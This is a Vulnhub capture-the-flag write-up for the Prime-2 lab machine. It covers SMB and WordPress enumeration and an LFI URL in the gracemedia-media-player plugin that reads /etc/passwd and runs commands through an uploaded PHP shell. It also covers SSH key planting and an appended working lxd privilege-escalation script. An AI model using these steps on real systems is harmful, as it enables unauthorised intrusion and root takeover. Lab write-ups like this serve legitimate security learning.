Vulnhub: Prime-2 write-up

Vishal
3 min read, May 13, 2021

This is the write-up for the Vulnhub machine Prime-2. It was created by Suraj, and if you also want to try this machine you can download it from here.

On this box, enumeration turns up 5 open ports. An SMB share allows anonymous access with READ and WRITE permissions, and WordPress is running on the web server. The WordPress plugin gracemedia-media-player version 1.0 is vulnerable to LFI; combining that with a PHP script placed on the writable share gives RCE. Since the share is writable, I uploaded an SSH public key to get user access, then used lxd for privilege escalation.

Let’s start with finding all open ports using nmap.

nmap all open ports

Now let’s enumerate the service versions on above ports.

First I used enum4linux to get share names, potential users, etc. It shows a “welcome” share.

enum4linux

I used smbmap to list the permissions, and we have READ and WRITE permission on the welcome share.

smbmap

I connected to the welcome share using smbclient and downloaded the files that looked interesting. There is only one file, “shell.sh”, with the contents below.

shell.sh

Time to enumerate the files and directories on port 80 using gobuster. It looks like WordPress is running on the remote host.

gobuster result

I decided to use the Metasploit auxiliary scanner to enumerate the plugins and themes.

After waiting for some time it reports the plugin “gracemedia-media-player version 1.0”, which is vulnerable to LFI. The exploit can be found here.

Using the above exploit I was able to view the /etc/passwd file.

/etc/passwd

If you remember, we have a shell.php file in the upload folder of the SMB welcome share, which is jarves's home directory on the box. Let's try to include that file through the LFI and see if we can get RCE.

http://192.168.2.7/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id

I used a Python reverse shell and got a shell on the box.

If you remember, we have write permission on jarves's home directory through the SMB share. I created a .ssh directory in the share, then uploaded the id_rsa.pub from my Kali machine into the .ssh directory.

SSH in as jarves.

SSH as jarves

The id command shows jarves is a member of the lxd group, so I used lxd to escalate privileges to root. I already described the steps in the write-up of the Hacksudo-3 machine. After following them I was able to get a root shell.

root on the box.
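For readers who have not seen the Hacksudo-3 write-up, the script below is an added example of the standard lxd-group escalation; it is not the author's steps and is not copied from that write-up. It assumes a small Alpine image tarball (built on the attacking machine with lxd-alpine-builder or distrobuilder) has already been copied to the box and is passed as the first argument. With no argument only the group check is defined and nothing is executed.

```shell
#!/bin/sh
# Added example, not the author's Hacksudo-3 steps: the standard lxd-group
# privilege escalation. Assumes an Alpine image tarball built on the attacker
# has already been copied to the box and is passed as $1. With no argument,
# nothing runs; the group check below is the only pure helper.
set -eu

# Return success if the group list (as printed by `id -nG`) contains lxd.
in_lxd_group() {
    for g in $1; do
        [ "$g" = lxd ] && return 0
    done
    return 1
}

# Import the image, start a privileged container with the host's / mounted at
# /mnt/root, and drop into a shell inside it. Inside the container /mnt/root is
# the host filesystem with root permissions: chroot into it, or copy a shell
# there and set the SUID bit on it.
lxd_root() {
    image=$1
    lxd init --auto 2>/dev/null || true     # no-op if lxd is already initialised
    lxc image import "$image" --alias privesc
    lxc init privesc pe -c security.privileged=true
    lxc config device add pe hostroot disk source=/ path=/mnt/root recursive=true
    lxc start pe
    lxc exec pe -- /bin/sh
}

if [ "$#" -ge 1 ]; then
    in_lxd_group "$(id -nG)" || { echo "not in the lxd group" >&2; exit 1; }
    lxd_root "$1"
fi
```

The security point is that membership in the lxd group is equivalent to root: a privileged container with the host root filesystem mounted lets an unprivileged user read and write any host file, so lxd group membership should be treated like sudo ALL when auditing a box.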

So that's it, nice box. Hope you liked it.

Thanks for reading!
